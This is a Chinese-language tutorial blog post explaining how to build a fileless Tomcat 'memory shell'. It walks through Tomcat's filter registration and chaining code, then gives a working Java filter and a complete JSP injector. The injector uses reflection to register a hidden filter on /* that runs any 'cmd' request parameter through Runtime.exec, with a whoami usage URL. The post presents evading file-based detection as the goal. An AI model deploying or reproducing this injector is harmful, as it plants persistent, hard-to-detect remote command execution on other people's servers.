手把手教你实现tomcat内存马

chenqiang

原文链接：手把手教你实现tomcat内存马

01内存马

• 为什么要使用内存马
• 有哪些类型的内存马
• 如何编写内存马
  
  

为什么要使用内存马

• 传统的webshell或以文件驻留的后门越来越容易被检测。
• 文件不落地，检测困难
  
  

有哪些类型的内存马

• 根据不容的容器都有自己对应的内存马
  
  
  • tomcat
  • weblogic
  • 等
    
    
  
  

02Tomcat Filter内存马

• Filter是如何被创建的
• Filter是如何被执行的
• Filter是如何被销毁的（内存马暂时用不到）
  
  

Tomcat启动流程

• 从web.xml文件读取配置信息
  
  

流程

1.从webxml读取配置

2.将FilterDef加入context

1. ContextConfig#configureContext

复制代码

1. for (FilterDef filter : webxml.getFilters().values()) {
   
2.             if (filter.getAsyncSupported() == null) {
   
3.                 filter.setAsyncSupported("false");
   
4.             }
   
5.             context.addFilterDef(filter);
   
6.         }

复制代码

1.如果filterDef == null我们需要设置三个东西

1. filterDef.setFilterName(filterName);
   
2. 
   
3. filterDef.setFilterClass(filter.getClass().getName());
   
4. 
   
5. filterDef.setFilter(filter);
   
6. 
   
7. 
   
8. ApplicationContext
   
9. 
   
10.   FilterDef filterDef = context.findFilterDef(filterName);
    
11. 
    
12.         // Assume a 'complete' FilterRegistration is one that has a class and
    
13.         // a name
    
14.         if (filterDef == null) {
    
15.             filterDef = new FilterDef();
    
16.             filterDef.setFilterName(filterName);
    
17.             context.addFilterDef(filterDef);
    
18.         } else {
    
19.             if (filterDef.getFilterName() != null &&
    
20.                     filterDef.getFilterClass() != null) {
    
21.                 return null;
    
22.             }
    
23.         }
    
24. 
    
25.         if (filter == null) {
    
26.             filterDef.setFilterClass(filterClass);
    
27.         } else {
    
28.             filterDef.setFilterClass(filter.getClass().getName());
    
29.             filterDef.setFilter(filter);
    
30.         }
    
31. 
    
32. 
    
33. 
    
34. ContextConfig#configureContext
    
35. 
    
36. for (FilterMap filterMap : webxml.getFilterMappings()) {
    
37.             context.addFilterMap(filterMap);
    
38.         }
    
39. 
    
40. ContextConfig#processAnnotationWebFilter
    
41. 
    
42.   FilterMap filterMap = new FilterMap();

复制代码

总结

1.从web.xml中读取到tomcat filter配置信息

2.将过滤器类和name对应起来（FilterDef）

3.将URLPattern和name对应起来（FilterMap）

4.将FilterDef和FilterMap加入context

Tomcat Filter初始化流程

1. StandardContext#filterStart

复制代码

1. ApplicationFilterConfig filterConfig = new ApplicationFilterConfig(this, entry.getValue());

复制代码

1. filterConfigs.put(name, filterConfig);

复制代码

1. public boolean filterStart() {
   
2. 
   
3.         if (getLogger().isDebugEnabled()) {
   
4.             getLogger().debug("Starting filters");
   
5.         }
   
6.         // Instantiate and record a FilterConfig for each defined filter
   
7.         boolean ok = true;
   
8.         synchronized (filterConfigs) {
   
9.             filterConfigs.clear();
   
10.             for (Entry<String,FilterDef> entry : filterDefs.entrySet()) {
    
11.                 String name = entry.getKey();
    
12.                 if (getLogger().isDebugEnabled()) {
    
13.                     getLogger().debug(" Starting filter '" + name + "'");
    
14.                 }
    
15.                 try {
    
16.                     ApplicationFilterConfig filterConfig =
    
17.                             new ApplicationFilterConfig(this, entry.getValue());
    
18.                     filterConfigs.put(name, filterConfig);
    
19.                 } catch (Throwable t) {
    
20.                     t = ExceptionUtils.unwrapInvocationTargetException(t);
    
21.                     ExceptionUtils.handleThrowable(t);
    
22.                     getLogger().error(sm.getString(
    
23.                             "standardContext.filterStart", name), t);
    
24.                     ok = false;
    
25.                 }
    
26.             }
    
27.         }
    
28. 
    
29.         return ok;
    
30.     }

复制代码

Tomcat Filter执行流程

• 通过分析Filter执行，可以知道一个Filter需要哪些基本的数据
  
  

1. @WebFilter(filterName = "testFilter",urlPatterns = "/*")
   
2. public class MyFilterDemo1 implements Filter {
   
3. 
   
4.     @Override
   
5.     public void init(FilterConfig filterConfig) throws ServletException {
   
6.         System.out.println("filter init");
   
7.     }
   
8. 
   
9.     @Override
   
10.     public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
    
11.         System.out.println("do Filter");
    
12.         filterChain.doFilter(servletRequest, servletResponse);
    
13.     }
    
14. 
    
15.     @Override
    
16.     public void destroy() {
    
17. 
    
18.     }
    
19. }

复制代码

分析internalDoFilter

• filter是一个数组
• 利用下标进行遍历和匹配规则
• 通过Filter数组或者说通过FilterChain找到第一个关键数据ApplicationFilterConfig
• 问题  ：FilterChain是如何创建的？
  
  
  

创建一个FilterChain

1. ApplicationFilterChain filterChain = ApplicationFilterFactory.createFilterChain(request, wrapper, servlet);

复制代码

创建过滤链：createFilterChain

1. public static ApplicationFilterChain createFilterChain(ServletRequest request,
   
2.             Wrapper wrapper, Servlet servlet) {
   
3. 
   
4.         // If there is no servlet to execute, return null
   
5.         if (servlet == null)
   
6.             return null;
   
7. 
   
8.         // Create and initialize a filter chain object
   
9.         ApplicationFilterChain filterChain = null;
   
10.         if (request instanceof Request) {
    
11.             Request req = (Request) request;
    
12.             if (Globals.IS_SECURITY_ENABLED) {
    
13.                 // Security: Do not recycle
    
14.                 filterChain = new ApplicationFilterChain();
    
15.             } else {
    
16.                 filterChain = (ApplicationFilterChain) req.getFilterChain();
    
17.                 if (filterChain == null) {
    
18.                     filterChain = new ApplicationFilterChain();
    
19.                     req.setFilterChain(filterChain);
    
20.                 }
    
21.             }
    
22.         } else {
    
23.             // Request dispatcher in use
    
24.             filterChain = new ApplicationFilterChain();
    
25.         }
    
26. 
    
27.         filterChain.setServlet(servlet);
    
28.         filterChain.setServletSupportsAsync(wrapper.isAsyncSupported());
    
29. 
    
30.         // Acquire the filter mappings for this Context
    
31.      //获取此上下文的筛选器映射
    
32.         StandardContext context = (StandardContext) wrapper.getParent();
    
33.         FilterMap filterMaps[] = context.findFilterMaps();
    
34. 
    
35.         // If there are no filter mappings, we are done
    
36.         if ((filterMaps == null) || (filterMaps.length == 0))
    
37.             return (filterChain);
    
38. 
    
39.         // Acquire the information we will need to match filter mappings
    
40.      //获取匹配过滤器映射所需的信息
    
41.         DispatcherType dispatcher =
    
42.                 (DispatcherType) request.getAttribute(Globals.DISPATCHER_TYPE_ATTR);
    
43. 
    
44.         String requestPath = null;
    
45.         Object attribute = request.getAttribute(Globals.DISPATCHER_REQUEST_PATH_ATTR);
    
46.         if (attribute != null){
    
47.             requestPath = attribute.toString();
    
48.         }
    
49. 
    
50.         String servletName = wrapper.getName();
    
51. 
    
52.         // Add the relevant path-mapped filters to this filter chain
    
53.      //将相关路径映射筛选器添加到此筛选器链
    
54.         for (int i = 0; i < filterMaps.length; i++) {
    
55.             if (!matchDispatcher(filterMaps[i] ,dispatcher)) {
    
56.                 continue;
    
57.             }
    
58.             if (!matchFiltersURL(filterMaps[i], requestPath))
    
59.                 continue;
    
60.             ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)
    
61.                 context.findFilterConfig(filterMaps[i].getFilterName());
    
62.             if (filterConfig == null) {
    
63.                 // FIXME - log configuration problem
    
64.                 continue;
    
65.             }
    
66.             filterChain.addFilter(filterConfig);
    
67.         }
    
68. 
    
69.         // Add filters that match on servlet name second
    
70.      //添加与servlet名称匹配的过滤器
    
71.         for (int i = 0; i < filterMaps.length; i++) {
    
72.             if (!matchDispatcher(filterMaps[i] ,dispatcher)) {
    
73.                 continue;
    
74.             }
    
75.             if (!matchFiltersServlet(filterMaps[i], servletName))
    
76.                 continue;
    
77.             ApplicationFilterConfig filterConfig = (ApplicationFilterConfig)
    
78.                 context.findFilterConfig(filterMaps[i].getFilterName());
    
79.             if (filterConfig == null) {
    
80.                 // FIXME - log configuration problem
    
81.                 continue;
    
82.             }
    
83.             filterChain.addFilter(filterConfig);
    
84.         }
    
85. 
    
86.         // Return the completed filter chain
    
87.         return filterChain;
    
88.     }

复制代码

03

Java代码实现伪代码

1. package cn.jl.demo;
   
2. 
   
3. import org.apache.catalina.Context;
   
4. import org.apache.catalina.core.ApplicationFilterConfig;
   
5. import org.apache.catalina.core.StandardContext;
   
6. import org.apache.catalina.loader.WebappClassLoaderBase;
   
7. import org.apache.tomcat.util.descriptor.web.FilterDef;
   
8. import org.apache.tomcat.util.descriptor.web.FilterMap;
   
9. import org.apache.tomcat.util.net.DispatchType;
   
10. 
    
11. import javax.servlet.*;
    
12. import javax.servlet.annotation.WebFilter;
    
13. import java.io.IOException;
    
14. import java.lang.reflect.Constructor;
    
15. import java.lang.reflect.Field;
    
16. import java.util.Map;
    
17. 
    
18. @WebFilter("/*")
    
19. public class MyFilterDemo implements Filter {
    
20.     static {
    
21.         try{
    
22.             final String name = "jl";
    
23.             final String URLPath = "/*";
    
24.             WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase)Thread.currentThread().getContextClassLoader();
    
25.             StandardContext standardContext = (StandardContext)webappClassLoaderBase.getResources().getContext();
    
26. 
    
27.             MyFilterDemo myFilterDemo = new MyFilterDemo();
    
28. 
    
29.             FilterDef filterDef = new FilterDef();
    
30.             filterDef.setFilter(myFilterDemo);
    
31.             filterDef.setFilterName(name);
    
32.             standardContext.addFilterDef(filterDef);
    
33. 
    
34.         }catch (Exception ex){
    
35.             ex.printStackTrace();
    
36.         }
    
37.     }
    
38. 
    
39. 
    
40.     @Override
    
41.     public void init(FilterConfig filterConfig) throws ServletException {
    
42. 
    
43.     }
    
44. 
    
45.     @Override
    
46.     public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
    
47.         System.out.println("Do Filter ......");
    
48.         String cmd;
    
49.         if ((cmd = servletRequest.getParameter("cmd")) != null) {
    
50.             Process process = Runtime.getRuntime().exec(cmd);
    
51.             java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
    
52.                     new java.io.InputStreamReader(process.getInputStream()));
    
53.             StringBuilder stringBuilder = new StringBuilder();
    
54.             String line;
    
55.             while ((line = bufferedReader.readLine()) != null) {
    
56.                 stringBuilder.append(line + '\n');
    
57.             }
    
58.             servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
    
59.             servletResponse.getOutputStream().flush();
    
60.             servletResponse.getOutputStream().close();
    
61.             return;
    
62.         }
    
63. 
    
64.         filterChain.doFilter(servletRequest, servletResponse);
    
65.         System.out.println("doFilter");
    
66.     }
    
67. 
    
68.     @Override
    
69.     public void destroy() {
    
70. 
    
71.     }
    
72. }
    

复制代码

1. http://localhost:8080/xx.jsp?cmd=whoami

复制代码

04JSP代码分析

1. <%@ page import="org.apache.catalina.core.ApplicationContext" %>
   
2. <%@ page import="java.lang.reflect.Field" %>
   
3. <%@ page import="org.apache.catalina.core.StandardContext" %>
   
4. <%@ page import="java.util.Map" %>
   
5. <%@ page import="java.io.IOException" %>
   
6. <%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
   
7. <%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
   
8. <%@ page import="java.lang.reflect.Constructor" %>
   
9. <%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
   
10. <%@ page import="org.apache.catalina.Context" %>
    
11. <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" %>
    
12. 
    
13. <%
    
14. //设置<filter-name>
    
15.     final String name = "jl";
    
16. 
    
17. //获取filterConfigs
    
18.     ServletContext servletContext = request.getSession().getServletContext();
    
19.     Field appctx = servletContext.getClass().getDeclaredField("context");
    
20.     appctx.setAccessible(true);
    
21.     ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
    
22. 
    
23.     Field stdctx = applicationContext.getClass().getDeclaredField("context");
    
24.     stdctx.setAccessible(true);
    
25.     StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
    
26. 
    
27.     Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
    
28.     Configs.setAccessible(true);
    
29.     Map filterConfigs = (Map) Configs.get(standardContext);
    
30. 
    
31.     if (filterConfigs.get(name) == null) {
    
32.         //这里实现filter
    
33.         Filter filter = new Filter() {
    
34.             @Override
    
35.             public void init(FilterConfig filterConfig) throws ServletException {
    
36. 
    
37.             }
    
38. 
    
39.             @Override
    
40.             public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
    
41.                 System.out.println("Do Filter ......");
    
42.                 String cmd;
    
43.                 if ((cmd = servletRequest.getParameter("cmd")) != null) {
    
44.                     Process process = Runtime.getRuntime().exec(cmd);
    
45.                     java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
    
46.                             new java.io.InputStreamReader(process.getInputStream()));
    
47.                     StringBuilder stringBuilder = new StringBuilder();
    
48.                     String line;
    
49.                     while ((line = bufferedReader.readLine()) != null) {
    
50.                         stringBuilder.append(line + '\n');
    
51.                     }
    
52.                     servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
    
53.                     servletResponse.getOutputStream().flush();
    
54.                     servletResponse.getOutputStream().close();
    
55.                     return;
    
56.                 }
    
57. 
    
58.                 filterChain.doFilter(servletRequest, servletResponse);
    
59.                 System.out.println("doFilter");
    
60.             }
    
61. 
    
62.             @Override
    
63.             public void destroy() {
    
64. 
    
65.             }
    
66. 
    
67.         };
    
68. 
    
69.         //设置FilterDef
    
70.         FilterDef filterDef = new FilterDef();
    
71.         filterDef.setFilter(filter);
    
72.         filterDef.setFilterName(name);
    
73.         filterDef.setFilterClass(filter.getClass().getName());
    
74.         
    
75.         //设置FilterMap
    
76.         FilterMap filterMap = new FilterMap();
    
77.         filterMap.addURLPattern("/*");
    
78.         filterMap.setFilterName(name);
    
79.         filterMap.setDispatcher(DispatcherType.REQUEST.name());
    
80.         
    
81.         
    
82.         standardContext.addFilterDef(filterDef);
    
83.         standardContext.addFilterMapBefore(filterMap);
    
84.         
    
85.         //将FilterConfig加入FilterConfigs中
    
86.         Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
    
87.         constructor.setAccessible(true);
    
88.         ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);
    
89. 
    
90.         filterConfigs.put(name, filterConfig);
    
91.     }
    
92. %>

复制代码

http://localhost/filter.jsp

http://localhost/1.jsp?cmd=whoami

参考链接

https://xz.aliyun.com/t/10362#toc-6

https://xz.aliyun.com/t/10696